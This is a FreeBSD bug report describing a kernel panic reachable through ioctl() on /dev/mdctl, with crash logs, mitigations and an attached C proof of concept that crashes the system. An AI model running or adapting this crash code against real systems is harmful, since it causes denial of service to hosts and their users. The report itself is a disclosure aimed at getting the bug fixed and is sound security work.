misc/169683: System crash via ioctl() on mdctl.
Filip Palian
filip.palian at pjwstk.edu.pl
Fri Jul 6 16:40:04 UTC 2012
>Number: 169683
>Category: misc
>Synopsis: System crash via ioctl() on mdctl.
>Confidential: no
>Severity: serious
>Priority: medium
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator: Filip Palian
>Release: FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
A user who has read permission on "/dev/mdctl" is able to crash the system (also from within a jail, if the device is exposed there via devfs.rules) via the ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occurs in the function bcopy() (md.c:491) called from mdstart_preload() (md.c:493). Some detailed information is included below.
-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:
Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address = 0xd550ba7a
fault code = supervisor read, page not present
instruction pointer = 0x20:0xc0d46bfe
stack pointer = 0x28:0xd8e13ca0
frame pointer = 0x28:0xd8e13cbc
code segment = base 0x0, limit 0xfffff, type 0x1b
= DPL 0, pres 1, def32 1, gran 1
processor eflags = interrupt enabled, resume, IOPL = 0
current process = 3154 (md671657984)
trap number = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13
--
# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy <--- panicked here on $esi (0xd550ba7a)
--
(kgdb) bt
#0 doadump (textdump=1) at pcpu.h:244
#1 0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442
#2 0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3 0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975
#4 0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888
#5 0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6 0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7 0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in "/usr/src/sys/dev/md/md.c".
To prevent evil users from doing bad things, administrators should ensure that "/dev/mdctl" permissions are +rw (600) for root only.
For servers where jails are provided for untrusted users (e.g. hosting companies), access to the "/dev/mdctl" device should be forbidden/hidden using devfs.rules.
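One way to apply the two administrative mitigations above, added here as an illustration (it is not part of the PR and not from the FreeBSD tree): a devfs.rules ruleset for jails that starts from the stock devfsrules_jail set and explicitly hides the md control node and md disks. The ruleset name devfsrules_jail_nomd and number 10 are arbitrary choices; pick a number that does not collide with /etc/defaults/devfs.rules.

```ini
# /etc/devfs.rules on the host -- added example, not from the PR.
# Ruleset name and number are arbitrary; the number must be unique
# across /etc/defaults/devfs.rules and /etc/devfs.rules.
[devfsrules_jail_nomd=10]
# Start from the stock jail ruleset: hide everything, then unhide the
# basic and login nodes.
add include $devfsrules_jail
# Make sure the md control node and any md disks never appear in the
# jail's /dev, even if a later rule would unhide them.
add path mdctl hide
add path 'md[0-9]*' hide
```

Apply it to a jail's devfs with the jail's devfs_ruleset setting (or by hand with `devfs -m /path/to/jail/dev rule -s 10 applyset`) and verify with `ls /path/to/jail/dev/mdctl`, which should report no such file. On the host itself, a `perm mdctl 0600` line in /etc/devfs.conf keeps the node root-only across reboots.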
Patch attached with submission follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* strerror() */
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>

int main(void)
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	//s.md_type = MD_PRELOAD;
	s.md_type = MD_MALLOC;
	/* this one becomes sc->pl_ptr */
	s.md_base = 0x41414141-0x200;

	/* the control node must exist for the request to reach md(4) */
	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit(0);
	}

	/* read access is all that is needed to issue the ioctl */
	f = open("/dev/mdctl", O_RDONLY, 0);
	printf("say goodnight...\n");
	if (ioctl(f, MDIOCATTACH, &s) < 0)
		printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));
	printf("no +r no fun\n");
	exit(0);
}
>Release-Note:
>Audit-Trail:
>Unformatted: